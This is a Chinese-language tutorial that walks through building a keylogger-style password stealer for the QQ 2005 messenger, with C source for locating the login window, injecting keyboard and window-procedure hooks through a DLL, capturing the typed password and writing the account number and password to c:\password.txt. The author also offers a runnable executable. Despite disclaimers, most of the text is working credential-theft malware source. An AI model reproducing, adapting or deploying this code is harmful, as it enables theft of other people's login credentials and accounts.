下載運行文件以及源代碼附件
[編者按:本文以純技術的角度探討使用鉤子來獲得密碼,請不要用於非法目的。]
最近天氣太熱,外加無聊,出於練習的目的,想到了寫個盜QQ的軟件,說“盜”,未免是太難聽了吧,於是我給它起名為“UiQQ道”.下面就是本軟件的界面部分:
(1)尋找QQ登陸界面。
(2)安裝鉤子
(3)鉤子函數的解釋.
(4)處理密碼。
以下部分全是使用C語言,文章中我假設讀者您是會C/SDK編程的。如果遇到相關的概念性問題,您可以查看MSDN或是上BBS 詢問!
第一部分:(1)尋找QQ登陸界面
軟件運行後,利用安裝定時器,每秒在系統找QQ登陸界面,這樣基本上只要用戶打開了QQ登陸界面就會被抓住其句柄,看下面代碼:
#define ID_MYTIMER 555
SetTimer(hDlg, ID_MYTIMER, 1000, NULL); 安裝好TIMER後,下面是處理主程序的WM_TIMER消息,凡是出現沒有定義的變量,您可以理解為是全局變量.
//處理WM_TIMER代碼
if (!IsWindow(g_hQQLogin)) //判斷g_hQQLogin是否是有效的窗口句柄
{
HWND hLogin=NULL;
g_hQQLogin = NULL;
SetQQHook(NULL); //參數為NULL是卸載HOOK,參數為句柄是安裝句柄
do
{
//利用FindWindowEx查找QQ登陸窗口,具體參數意思請查MSDN
g_hQQLogin=FindWindowEx(NULL,g_hQQLogin,"#32770",NULL); //對話框的類都是#32770
//找到類名是#32770後,再在其窗體內找一個具有“ 登錄QQ”的BUTTON按紐
//這一句很關鍵,如果你的QQ登陸窗口上沒有" 登錄QQ"字樣,那麼獲取密碼將失敗!
hLogin = FindWindowEx(g_hQQLogin, NULL, "Button", " 登錄QQ");
}
while(g_hQQLogin != NULL && hLogin == NULL); //直到找到指定的窗口,即:QQ登陸窗口
if (g_hQQLogin != NULL)
{
SetQQHook(g_hQQLogin); //安裝HOOK,此函數在DLL文件中 第二部分中介紹
}
}
上面就是查找QQ登陸窗口句柄的過程,從代碼可以看出我用的方法:找一個其子窗體中有一個標題為“ 登錄QQ”的BUTTON的對話框(這句話說得有點饒口,這句話如果也看不懂,下面您不用看了:()
我最開始是想利用 FindWindow(NULL,"QQ用戶登陸窗口")來查找,但是我用Spy++看了QQ登陸窗口的標題並不是“QQ用戶登陸窗口”,而是“亂碼”,其中包含了回車鍵等特殊字符,於是我用了FindWindowEx().
第二部分:(2)安裝鉤子
找到了QQ登陸窗口後,就成功了一半。
下面是DLL文件中的安裝HOOK的函數SetQQHook(), 為什麼要用DLL(動態連接庫)?要去“鉤”其他進程的消息,得讓HOOK函數在DLL中,這樣好映射到其地址空間中!
BOOL WINAPI SetQQHook(HWND hQQLogin)
{
//獲得登陸框的句柄
BOOL bRet = FALSE;
if (hQQLogin != NULL)
{
DWORD dwThreadID = GetWindowThreadProcessId(hQQLogin, NULL); //這是什麼意思?看MSDN
g_hNum = GetDlgItem(hQQLogin, 138); //不同版本QQ,此處不一樣!
得到QQ號的子窗口句柄
g_hPsw = GetDlgItem(hQQLogin, 180); //不同版本QQ,此處不一樣!得到QQ密碼的子窗口句柄
if (g_hNum == NULL)
{
MessageBox(NULL,"哭了,號碼句柄都沒有得到!","郁悶",0);
return FALSE;
}
if(g_hPsw==NULL)
{
MessageBox(NULL,"哭了,密碼句柄都沒有得到!","郁悶",0);
return FALSE;
}
//分別鍵盤HOOK,和界面部分消息處理的HOOK
g_hProc = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, g_hInstDLL,
dwThreadID);
g_hKey = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstDLL, dwThreadID);
bRet = (g_hProc != NULL) && (g_hKey != NULL);
}
else
{
// 卸載鉤子
bRet = UnhookWindowsHookEx(g_hProc) && UnhookWindowsHookEx(g_hKey);
g_hProc = NULL;
g_hKey = NULL;
g_hNum = NULL;
}
return bRet;
}
上面是安裝HOOK部分的代碼,就這麼簡單,下面提到了CallWndProc,KeyboardProc是兩個回調函數,是我第三部分要解釋的鉤子函數。
第三部分:(3)鉤子函數的解釋
CallWndProc,KeyboardProc是兩個回調函數的原型和具體代碼如下:
//
鉤子過程,監視“登陸”的命令消息
LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam)
{
CWPSTRUCT *p = (CWPSTRUCT *)lParam;
// 捕獲“登陸”按鈕
if (p->message == WM_COMMAND && p->wParam ==16032)
//下面個函數是我在第四部分介紹-“處理密碼”部分會仔細說明
//當用戶點了登陸按鈕,說明QQ號碼和QQ密碼已經填寫完畢,當然可以去獲得密碼了
GetPasswrod();
return CallNextHookEx(g_hProc, nCode, wParam, lParam);
}
// 鍵盤鉤子過程,監視“登陸”的熱鍵消息
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
// 捕獲熱鍵消息,記錄鍵盤的按鍵盤過程,pmsg是PMSG類型的,i是全局Static類型的
pmsg[i].wParam =wParam;
i++;
if (wParam == VK_RETURN) //用戶使用鍵盤“回車”來登陸,用戶用了回車後,就可以可以去獲得密碼了
GetPasswrod();
return CallNextHookEx(g_hKey, nCode, wParam, lParam);
}
在明白了這兩個鉤子函數後就可以看後期是如何具體處理密碼的了,這就是下面的第四部分內容。
第四部分:(4)處理密碼
如果您讀到了此處,我想得暫停一會,先讓我來幫你回憶一下前面提到的幾個關鍵的變量
第一個:QQ號的子窗口句柄 g_hNum
第二個:QQ密碼的子窗口句柄 g_hPsw //此部分暫時不使用,下面
第三個:存鍵盤按鍵的 pmsg
上面三變量分別出現在第二部分和第三部分,都是全局共享(shared)變量QQ密碼的子窗口句柄 g_hPsw 此部分暫時不使用,你可以看到下面代碼中有句用到g_hPsw的語句是我注釋掉了的,原因是無法通過那樣去得到QQ密碼,得處理按鍵消息。
void GetPasswrod()
{
//聲明變量和初始化
HANDLE f;
TCHAR num[13];
TCHAR psw[21];
TCHAR total[50];
int j;
memset(num,0,sizeof(num));
memset(total,0,sizeof(total));
memset(psw,0,sizeof(psw));
DWORD dw;
//得到QQ號的內容,以為有的人的QQ號是在登陸框有記錄,其QQ號並是用鍵盤輸入的
GetWindowText(g_hNum,(LPSTR)num,sizeof(num));
//GetWindowText(g_hPsw,(LPSTR)psw,sizeof(psw));
//此句不使用,無法這樣獲得密碼
//提取出鍵盤記錄,此內容也許全是密碼,也許是QQ號+QQ密碼
for(j=0;j 20;j++)
{
psw[j]=(TCHAR)pmsg[j*2].wParam ;
}
psw[j+1]='\0';
//把QQ號碼和QQ密碼寫入C盤password.txt中
f = CreateFile("c:\\password.txt",
GENERIC_WRITE,
FILE_SHARE_WRITE,
NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
strcat(total,"號碼");
strcat(total,num);
strcat(total,"密碼:");
strcat(total,psw);
WriteFile(f,&total,sizeof(total),&dw,NULL);
CloseHandle(f);
}
最後在C盤password.txt也許會出現這樣兩種情況:
1)當QQ號是沒有用輸入,而已用的粘貼或者是電腦以前有記錄則是:號碼:21728812密碼:TEST
2) 當QQ號是用的鍵盤輸入,電腦沒有QQ號記錄時則是: 號碼:21728812密碼:21728812TEST
可以看出,第2種情況把QQ當成了密碼了,所以密碼還得減去QQ號。
特別說明:我這樣直接處理wParam參數,得到的字符密碼全是大寫的,具體大小寫問題我沒有就沒有仔細去處理的,功能實現就行了,畢竟我使用他不用來盜密碼的!
上面四部分基本上獲得密碼的功能介紹完畢。凡是沒有介紹的變量皆是全局變量,沒有提到的函數如:GetWindowThreadProcessId(),SetWindowsHookEx(),UnhookWindowsHookEx(),CallNextHookEx(),CreateFile(),WriteFile()等皆是Windows
API,詳細使用說明請查MSDN(http://www.msdn.com),我提到的“HOOK”,“鉤子”是同一個意思,也許有的地方我說的鉤子函數,而另外一個地方說的是HOOK函數
特別說明:上面有具體的運行文件,由於小弟並沒有考慮到更多細節,我只是用了“理想”狀況下去獲得密碼,並且或的密碼後並沒有注重後期密碼處理,也許出現密碼大小寫不符合或是無法得到密碼,寫這篇文章意在告訴一些對這方面感到疑惑的朋友基本的原理,和希望和大家交流
!
注意:本人使用的QQ2005 賀歲版 版本號:13.5.0.8213,其他版本的QQ我無法保證可以正確得到密碼!
參考資料:MSDN,Titilima的QQ尾巴病毒模擬代碼